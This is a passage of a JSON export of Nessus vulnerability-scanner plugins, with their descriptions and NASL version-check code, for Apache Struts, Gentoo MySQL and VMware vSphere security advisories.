"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T16:59:14", "description": "The version of Apache Struts running on the remote host is 2.x prior to 2.3.4.1. It, therefore, is affected by multiple vulnerabilities including a Denial of Service (DoS) and cross-site request forgery (XSRF) vulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.1, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"}, "published": "2018-09-11T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.3.4.1 Multiple Vulnerabilities (S2-010) (S2-011)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-4386", "CVE-2012-4387"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_4_1.NASL", "href": "https://www.tenable.com/plugins/nessus/117400", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117400);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2012-4386\", \"CVE-2012-4387\");\n script_bugtraq_id(54346, 55346);\n\n script_name(english:\"Apache Struts 2.x < 2.3.4.1 Multiple Vulnerabilities (S2-010) (S2-011)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x\nprior to 2.3.4.1. It, therefore, is affected by multiple\nvulnerabilities including a Denial of Service (DoS) and cross-site\nrequest forgery (XSRF) vulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-010\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-011\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.4.1 or later\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-4386\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/08/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/08/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.0.0\", \"max_version\" : \"2.3.4\", \"fixed_version\" : \"2.3.4.1\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING, flags:{xsrf:TRUE});\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:37:48", "description": "The version of Apache Struts running on the remote Windows host is 2.x prior to 2.3.29. It is, therefore, affected by the following vulnerabilities :\n\n - A remote code execution vulnerability exists due to erroneously performing double OGNL evaluation of attribute values assigned to certain tags. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary code.\n (CVE-2016-0785)\n\n - A cross-site request forgery (XSRF) vulnerability exists due to improper validation of session tokens. An unauthenticated, remote attacker can exploit this, via a malicious OGNL expression, to bypass token validation and perform an XSRF attack. (CVE-2016-4430)\n\n - Multiple input validation issues exists that allow internal security mechanisms to be bypassed, allowing the manipulation of a return string which can be used to redirect users to a malicious website. This affects both the default action method the 'getter' action method.\n (CVE-2016-4431, CVE-2016-4433)\n\n - An unspecified flaw exists that is triggered during the cleanup of action names. An unauthenticated, remote attacker can exploit this, via a specially crafted payload, to perform unspecified actions. (CVE-2016-4436)\n\n - A remote code execution vulnerability exists in the REST plugin due to improper handling of OGNL expressions. An unauthenticated, remote attacker can exploit this, via a specially crafted OGNL expression, to execute arbitrary code. (CVE-2016-4438)\n\n - A remote code execution vulnerability exists in user tag attributes due to improper handling of OGNL expressions. An unauthenticated, remote attacker can exploit this, via a specially crafted double OGNL evaluation, to execute arbitrary code. (CVE-2016-4461)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-06-24T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.3.29 Multiple Vulnerabilities (S2-035 - S2-040)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0785", "CVE-2016-4430", "CVE-2016-4431", "CVE-2016-4433", "CVE-2016-4436", "CVE-2016-4438", "CVE-2016-4461"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_29_WIN_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/91812", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91812);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2016-0785\",\n \"CVE-2016-4430\",\n \"CVE-2016-4431\",\n \"CVE-2016-4433\",\n \"CVE-2016-4436\",\n \"CVE-2016-4438\",\n \"CVE-2016-4461\"\n );\n script_bugtraq_id(\n 85066,\n 91275,\n 91277,\n 91280,\n 91281,\n 91282,\n 91284\n );\n\n script_name(english:\"Apache Struts 2.x < 2.3.29 Multiple Vulnerabilities (S2-035 - S2-040)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a web application that uses a Java\nframework that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote Windows host is 2.x\nprior to 2.3.29. It is, therefore, affected by the following\nvulnerabilities :\n\n - A remote code execution vulnerability exists due to\n erroneously performing double OGNL evaluation of\n attribute values assigned to certain tags. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted request, to execute arbitrary code.\n (CVE-2016-0785)\n\n - A cross-site request forgery (XSRF) vulnerability exists\n due to improper validation of session tokens. An\n unauthenticated, remote attacker can exploit this, via a\n malicious OGNL expression, to bypass token validation\n and perform an XSRF attack. (CVE-2016-4430)\n\n - Multiple input validation issues exists that allow\n internal security mechanisms to be bypassed, allowing\n the manipulation of a return string which can be used to\n redirect users to a malicious website. This affects both\n the default action method the 'getter' action method.\n (CVE-2016-4431, CVE-2016-4433)\n\n - An unspecified flaw exists that is triggered during the\n cleanup of action names. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n payload, to perform unspecified actions. (CVE-2016-4436)\n\n - A remote code execution vulnerability exists in the REST\n plugin due to improper handling of OGNL expressions. An\n unauthenticated, remote attacker can exploit this, via\n a specially crafted OGNL expression, to execute\n arbitrary code. (CVE-2016-4438)\n\n - A remote code execution vulnerability exists in user tag\n attributes due to improper handling of OGNL expressions. \n An unauthenticated, remote attacker can exploit this, \n via a specially crafted double OGNL evaluation, to \n execute arbitrary code. (CVE-2016-4461)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-035.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-036.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-037.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-038.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-039.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-040.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/version-notes-2329.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.29 or later. Alternatively,\napply the workarounds referenced in the vendor advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4461\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts REST Plugin OGNL Expression Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\n\napp_info = vcf::combined_get_app_info(app:'Apache Struts');\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { 'min_version' : '2.0.0', 'max_version' : '2.3.28.1', 'fixed_display' : '2.3.29' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, flags:{xsrf:TRUE});\n\n", "cvss": {"score": 9, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:48:36", "description": "The remote host is affected by the vulnerability described in GLSA-201409-04 (MySQL: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in MySQL. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A local attacker could possibly gain escalated privileges. A remote attacker could send a specially crafted SQL query, possibly resulting in a Denial of Service condition. A remote attacker could entice a user to connect to specially crafted MySQL server, possibly resulting in execution of arbitrary code with the privileges of the process.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-05T00:00:00", "type": "nessus", "title": "GLSA-201409-04 : MySQL: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1861", "CVE-2013-2134", "CVE-2013-3839", "CVE-2013-5767", "CVE-2013-5770", "CVE-2013-5786", "CVE-2013-5793", "CVE-2013-5807", "CVE-2013-5860", "CVE-2013-5881", "CVE-2013-5882", "CVE-2013-5891", "CVE-2013-5894", "CVE-2013-5908", "CVE-2014-0001", "CVE-2014-0384", "CVE-2014-0386", "CVE-2014-0393", "CVE-2014-0401", "CVE-2014-0402", "CVE-2014-0412", "CVE-2014-0420", "CVE-2014-0427", "CVE-2014-0430", "CVE-2014-0431", "CVE-2014-0433", "CVE-2014-0437", "CVE-2014-2419", "CVE-2014-2430", "CVE-2014-2431", "CVE-2014-2432", "CVE-2014-2434", "CVE-2014-2435", "CVE-2014-2436", "CVE-2014-2438", "CVE-2014-2440"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:mysql", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201409-04.NASL", "href": "https://www.tenable.com/plugins/nessus/77548", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201409-04.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77548);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-1861\", \"CVE-2013-2134\", \"CVE-2013-3839\", \"CVE-2013-5767\", \"CVE-2013-5770\", \"CVE-2013-5786\", \"CVE-2013-5793\", \"CVE-2013-5807\", \"CVE-2013-5860\", \"CVE-2013-5881\", \"CVE-2013-5882\", \"CVE-2013-5891\", \"CVE-2013-5894\", \"CVE-2013-5908\", \"CVE-2014-0001\", \"CVE-2014-0384\", \"CVE-2014-0386\", \"CVE-2014-0393\", \"CVE-2014-0401\", \"CVE-2014-0402\", \"CVE-2014-0412\", \"CVE-2014-0420\", \"CVE-2014-0427\", \"CVE-2014-0430\", \"CVE-2014-0431\", \"CVE-2014-0433\", \"CVE-2014-0437\", \"CVE-2014-2419\", \"CVE-2014-2430\", \"CVE-2014-2431\", \"CVE-2014-2432\", \"CVE-2014-2434\", \"CVE-2014-2435\", \"CVE-2014-2436\", \"CVE-2014-2438\", \"CVE-2014-2440\");\n script_bugtraq_id(58511, 60346, 63105, 63107, 63109, 63113, 63116, 63119, 64849, 64854, 64864, 64868, 64873, 64877, 64880, 64885, 64888, 64891, 64893, 64895, 64896, 64897, 64898, 64904, 64908, 65298, 66835, 66846, 66850, 66853, 66858, 66872, 66875, 66880, 66890, 66896);\n script_xref(name:\"GLSA\", value:\"201409-04\");\n\n script_name(english:\"GLSA-201409-04 : MySQL: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201409-04\n(MySQL: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in MySQL. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A local attacker could possibly gain escalated privileges. A remote\n attacker could send a specially crafted SQL query, possibly resulting in\n a Denial of Service condition. A remote attacker could entice a user to\n connect to specially crafted MySQL server, possibly resulting in\n execution of arbitrary code with the privileges of the process.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201409-04\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All MySQL users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-db/mysql-5.5.39'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-db/mysql\", unaffected:make_list(\"ge 5.5.39\"), vulnerable:make_list(\"lt 5.5.39\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MySQL\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:52:35", "description": "a. vCenter and ESX update to JRE 1.6.0 Update 31\n\n The Oracle (Sun) JRE is updated to version 1.6.0_31, which addresses multiple security issues. Oracle has documented the CVE identifiers that are addressed by this update in the Oracle Java SE Critical Patch Update Advisory of February 2012.\n\nb. vCenter Update Manager update to JRE 1.5.0 Update 36\n\n The Oracle (Sun) JRE is updated to 1.5.0_36 to address multiple security issues. Oracle has documented the CVE identifiers that are addressed in JRE 1.5.0_36 in the Oracle Java SE Critical Patch Update Advisory for June 2012.\n\nc. Update to ESX/ESXi userworld OpenSSL library\n\n The ESX/ESXi userworld OpenSSL library is updated from version 0.9.8p to version 0.9.8t to resolve multiple security issues.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2010-4180, CVE-2010-4252, CVE-2011-0014, CVE-2011-4108, CVE-2011-4109, CVE-2011-4576, CVE-2011-4577, CVE-2011-4619, and CVE-2012-0050 to these issues.\n\nd. Update to ESX service console OpenSSL RPM\n\n The service console OpenSSL RPM is updated to version 0.9.8e-22.el5_8.3 to resolve a security issue.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2012-2110 to this issue.\n\ne. Update to ESX service console kernel\n\n The ESX service console kernel is updated to resolve multiple security issues.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2011-1833, CVE-2011-2484, CVE-2011-2496, CVE-2011-3188, CVE-2011-3209, CVE-2011-3363, CVE-2011-4110, CVE-2011-1020, CVE-2011-4132, CVE-2011-4324, CVE-2011-4325, CVE-2012-0207, CVE-2011-2699, and CVE-2012-1583 to these issues.\n\nf. Update to ESX service console Perl RPM\n\n The ESX service console Perl RPM is updated to perl-5.8.8.32.1.8999.vmw to resolve multiple security issues.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2010-2761, CVE-2010-4410, and CVE-2011-3597 to these issues.\n\ng. Update to ESX service console libxml2 RPMs\n\n The ESX service console libmxl2 RPMs are updated to libxml2-2.6.26-2.1.15.el5_8.2 and libxml2-python-2.6.26-2.1.15.el5_8.2 to resolve a security issue.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2012-0841 to this issue.\n\nh. Update to ESX service console glibc RPM\n\n The ESX service console glibc RPM is updated to version glibc-2.5-81.el5_8.1 to resolve multiple security issues.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2009-5029, CVE-2009-5064, CVE-2010-0830, CVE-2011-1089, CVE-2011-4609, and CVE-2012-0864 to these issue.\n\ni. Update to ESX service console GnuTLS RPM\n\n The ESX service console GnuTLS RPM is updated to version 1.4.1-7.el5_8.2 to resolve multiple security issues.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2011-4128, CVE-2012-1569, and CVE-2012-1573 to these issues.\n\nj. Update to ESX service console popt, rpm, rpm-libs, and rpm-python RPMS\n\n The ESX service console popt, rpm, rpm-libs, and rpm-python RPMS are updated to the following versions to resolve multiple security issues :\n - popt-1.10.2.3-28.el5_8\n - rpm-4.4.2.3-28.el5_8\n - rpm-libs-4.4.2.3-28.el5_8\n - rpm-python-4.4.2.3-28.el5_8\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2012-0060, CVE-2012-0061, and CVE-2012-0815 to these issues.\n\nk. Vulnerability in third-party Apache Struts component\n\n The version of Apache Struts in vCenter Operations has been updated to 2.3.4 which addresses an arbitrary file overwrite vulnerability. This vulnerability allows an attacker to create a denial of service by overwriting arbitrary files without authentication. The attacker would need to be on the same network as the system where vCOps is installed.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2012-0393 to this issue.\n\n Note: Apache struts 2.3.4 addresses the following issues as well :\n CVE-2011-5057, CVE-2012-0391, CVE-2012-0392, CVE-2012-0394. It was found that these do not affect vCOps.\n\n VMware would like to thank Alexander Minozhenko from ERPScan for reporting this issue to us.", "cvss3": {"score": 9.1, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H"}, "published": "2012-08-31T00:00:00", "type": "nessus", "title": "VMSA-2012-0013 : VMware vSphere and vCOps updates to third-party libraries", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-5029", "CVE-2009-5064", "CVE-2010-0830", "CVE-2010-2761", "CVE-2010-4180", "CVE-2010-4252", "CVE-2010-4410", "CVE-2011-0014", "CVE-2011-1020", "CVE-2011-1089", "CVE-2011-1833", "CVE-2011-2484", "CVE-2011-2496", "CVE-2011-2699", "CVE-2011-3188", "CVE-2011-3209", "CVE-2011-3363", "CVE-2011-3597", "CVE-2011-4108", "CVE-2011-4109", "CVE-2011-4110", "CVE-2011-4128", "CVE-2011-4132", "CVE-2011-4324", "CVE-2011-4325", "CVE-2011-4576", "CVE-2011-4577", "CVE-2011-4609", "CVE-2011-4619", "CVE-2011-5057", "CVE-2012-0050", "CVE-2012-0060", "CVE-2012-0061", "CVE-2012-0207", "CVE-2012-0391", "CVE-2012-0392", "CVE-2012-0393", "CVE-2012-0394", "CVE-2012-0815", "CVE-2012-0841", "CVE-2012-0864", "CVE-2012-1569", "CVE-2012-1573", "CVE-2012-1583", "CVE-2012-2110"], "modified": "2021-01-06T00:00:00", "cpe": ["cpe:/o:vmware:esx:4.0", "cpe:/o:vmware:esx:4.1", "cpe:/o:vmware:esxi:4.1", "cpe:/o:vmware:esxi:5.0"], "id": "VMWARE_VMSA-2012-0013.NASL", "href": "https://www.tenable.com/plugins/nessus/61747", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from VMware Security Advisory 2012-0013. \n# The text itself is copyright (C) VMware Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61747);\n script_version(\"1.57\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0830\", \"CVE-2010-2761\", \"CVE-2010-4180\", \"CVE-2010-4252\", \"CVE-2010-4410\", \"CVE-2011-0014\", \"CVE-2011-1020\", \"CVE-2011-1089\", \"CVE-2011-1833\", \"CVE-2011-2484\", \"CVE-2011-2496\", \"CVE-2011-2699\", \"CVE-2011-3188\", \"CVE-2011-3209\", \"CVE-2011-3363\", \"CVE-2011-3597\", \"CVE-2011-4108\", \"CVE-2011-4109\", \"CVE-2011-4110\", \"CVE-2011-4128\", \"CVE-2011-4132\", \"CVE-2011-4324\", \"CVE-2011-4325\", \"CVE-2011-4576\", \"CVE-2011-4577\", \"CVE-2011-4609\", \"CVE-2011-4619\", \"CVE-2012-0050\", \"CVE-2012-0060\", \"CVE-2012-0061\", \"CVE-2012-0207\", \"CVE-2012-0393\", \"CVE-2012-0815\", \"CVE-2012-0841\", \"CVE-2012-0864\", \"CVE-2012-1569\", \"CVE-2012-1573\", \"CVE-2012-1583\", \"CVE-2012-2110\");\n script_bugtraq_id(40063, 44199, 45145, 45163, 45164, 46264, 46567, 46740, 47321, 48383, 48802, 49108, 49289, 49626, 49911, 50311, 50609, 50663, 50755, 50798, 50898, 51194, 51257, 51281, 51343, 51366, 51439, 51467, 51563, 52009, 52010, 52011, 52012, 52013, 52014, 52015, 52016, 52017, 52018, 52019, 52020, 52107, 52161, 52201, 52667, 52668, 52865, 53136, 53139, 53158, 53946, 53947, 53948, 53949, 53950, 53951, 53952, 53953, 53954, 53956, 53958, 53959, 53960);\n script_xref(name:\"VMSA\", value:\"2012-0013\");\n\n script_name(english:\"VMSA-2012-0013 : VMware vSphere and vCOps updates to third-party libraries\");\n script_summary(english:\"Checks esxupdate output for the patches\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote VMware ESXi / ESX host is missing one or more\nsecurity-related patches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"a. vCenter and ESX update to JRE 1.6.0 Update 31\n\n The Oracle (Sun) JRE is updated to version 1.6.0_31, which\n addresses multiple security issues. Oracle has documented the\n CVE identifiers that are addressed by this update in the Oracle\n Java SE Critical Patch Update Advisory of February 2012.\n\nb. vCenter Update Manager update to JRE 1.5.0 Update 36\n\n The Oracle (Sun) JRE is updated to 1.5.0_36 to address multiple\n security issues. Oracle has documented the CVE identifiers that\n are addressed in JRE 1.5.0_36 in the Oracle Java SE Critical\n Patch Update Advisory for June 2012.\n\nc. Update to ESX/ESXi userworld OpenSSL library\n\n The ESX/ESXi userworld OpenSSL library is updated from version\n 0.9.8p to version 0.9.8t to resolve multiple security issues.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2010-4180, CVE-2010-4252,\n CVE-2011-0014, CVE-2011-4108, CVE-2011-4109, CVE-2011-4576,\n CVE-2011-4577, CVE-2011-4619, and CVE-2012-0050 to these issues.\n\nd. Update to ESX service console OpenSSL RPM\n\n The service console OpenSSL RPM is updated to version\n 0.9.8e-22.el5_8.3 to resolve a security issue.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the name CVE-2012-2110 to this issue.\n\ne. Update to ESX service console kernel\n\n The ESX service console kernel is updated to resolve multiple\n security issues.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2011-1833, CVE-2011-2484,\n CVE-2011-2496, CVE-2011-3188, CVE-2011-3209, CVE-2011-3363,\n CVE-2011-4110, CVE-2011-1020, CVE-2011-4132, CVE-2011-4324,\n CVE-2011-4325, CVE-2012-0207, CVE-2011-2699, and CVE-2012-1583\n to these issues.\n\nf. Update to ESX service console Perl RPM\n\n The ESX service console Perl RPM is updated to\n perl-5.8.8.32.1.8999.vmw to resolve multiple security issues.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2010-2761, CVE-2010-4410, and\n CVE-2011-3597 to these issues.\n\ng. Update to ESX service console libxml2 RPMs\n\n The ESX service console libmxl2 RPMs are updated to\n libxml2-2.6.26-2.1.15.el5_8.2 and\n libxml2-python-2.6.26-2.1.15.el5_8.2 to resolve a security\n issue.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the name CVE-2012-0841 to this issue.\n\nh. Update to ESX service console glibc RPM\n\n The ESX service console glibc RPM is updated to version\n glibc-2.5-81.el5_8.1 to resolve multiple security issues.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2009-5029, CVE-2009-5064,\n CVE-2010-0830, CVE-2011-1089, CVE-2011-4609, and CVE-2012-0864\n to these issue.\n\ni. Update to ESX service console GnuTLS RPM\n\n The ESX service console GnuTLS RPM is updated to version\n 1.4.1-7.el5_8.2 to resolve multiple security issues.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2011-4128, CVE-2012-1569, and\n CVE-2012-1573 to these issues.\n\nj. Update to ESX service console popt, rpm, rpm-libs,\n and rpm-python 